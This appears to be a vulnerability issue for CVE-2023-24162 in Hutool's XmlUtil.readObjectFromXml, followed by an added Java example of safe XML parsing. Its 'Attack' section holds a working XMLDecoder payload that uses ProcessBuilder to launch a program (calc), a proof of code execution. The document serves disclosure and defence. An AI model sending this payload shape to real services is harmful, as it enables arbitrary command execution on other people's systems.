Headline
CVE-2023-24162: XmlUtil Deserialization vulnerability · Issue #2855 · dromara/hutool
Deserialization vulnerability in Dromara Hutool v5.8.11 allows attacker to execute arbitrary code via the XmlUtil.readObjectFromXml parameter.
Desc
Hutool provides XML utility classes that may be vulnerable to remote code execution when XmlUtil.readObjectFromXml is used to interpret untrusted XML strings.
Detailed
The method calls java.beans.XMLDecoder.readObject to parse the XML string; XMLDecoder instantiates the classes and invokes the methods named in the document, so an untrusted string leads to a deserialization vulnerability.
cn.hutool.core.util.XmlUtil#readObjectFromXml
Attack
XmlUtil.readObjectFromXml("<java>\n" +
    "  <object class=\"java.lang.ProcessBuilder\">\n" +
    "    <array class=\"java.lang.String\" length=\"1\">\n" +
    "      <void index=\"0\">\n" +
    "        <string>calc</string>\n" +
    "      </void>\n" +
    "    </array>\n" +
    "    <void method=\"start\"></void>\n" +
    "  </object>\n" +
    "</java>\n");
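Mitigation, as an added example that is not Hutool's code and not part of the original issue: untrusted XML should be read as data only, with a secured DOM parser, never handed to XMLDecoder, whose document format is a list of object constructions and method calls to execute. The Settings record, the settings/name/retries element names and the readSettings method are assumptions made for the illustration; the parser features are standard JAXP/Xerces feature names.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

/**
 * Added example (not Hutool's code): read untrusted XML as plain data.
 * A DOM parse only produces nodes; it never instantiates classes named
 * inside the document, which is what makes XMLDecoder unsafe here.
 */
public final class SafeXmlRead {

    // Hypothetical data class standing in for whatever the caller expects.
    public record Settings(String name, int retries) {}

    // DOM parser with DOCTYPE and external entities disabled (XXE hardening).
    private static DocumentBuilder secureBuilder() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    /** Parses the XML into a DOM and maps the expected elements by hand. */
    public static Settings readSettings(String xml) throws Exception {
        Document doc = secureBuilder().parse(
            new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        Element root = doc.getDocumentElement();
        // The XMLDecoder document format has a <java> root element; there is
        // no legitimate reason for untrusted data to arrive in that shape,
        // so reject it explicitly (and log it, in a real service).
        if ("java".equals(root.getTagName())) {
            throw new IllegalArgumentException("refusing XMLDecoder-format document");
        }
        if (!"settings".equals(root.getTagName())) {
            throw new IllegalArgumentException("unexpected root element: " + root.getTagName());
        }
        String name = text(root, "name");
        int retries = Integer.parseInt(text(root, "retries"));
        return new Settings(name, retries);
    }

    // Returns the text of exactly one child element, or fails loudly.
    private static String text(Element parent, String tag) {
        NodeList nodes = parent.getElementsByTagName(tag);
        if (nodes.getLength() != 1) {
            throw new IllegalArgumentException("expected exactly one <" + tag + ">");
        }
        return nodes.item(0).getTextContent().trim();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample input in the expected shape.
        String ok = "<settings><name>worker</name><retries>3</retries></settings>";
        System.out.println(readSettings(ok));

        // Constructed sample in the XMLDecoder document shape: the DOM parser
        // treats it as inert nodes and the root check rejects it.
        String decoderShaped = "<java><object class=\"some.Class\"/></java>";
        try {
            readSettings(decoderShaped);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The point of the design is that the target type is fixed by the application code (Settings) rather than by the document, so the input can never choose which class gets constructed. If an existing code path truly needs XMLDecoder-style object graphs, the only safe input for it is data the application itself produced and stored where it cannot be tampered with; XMLDecoder offers no class allowlist to retrofit.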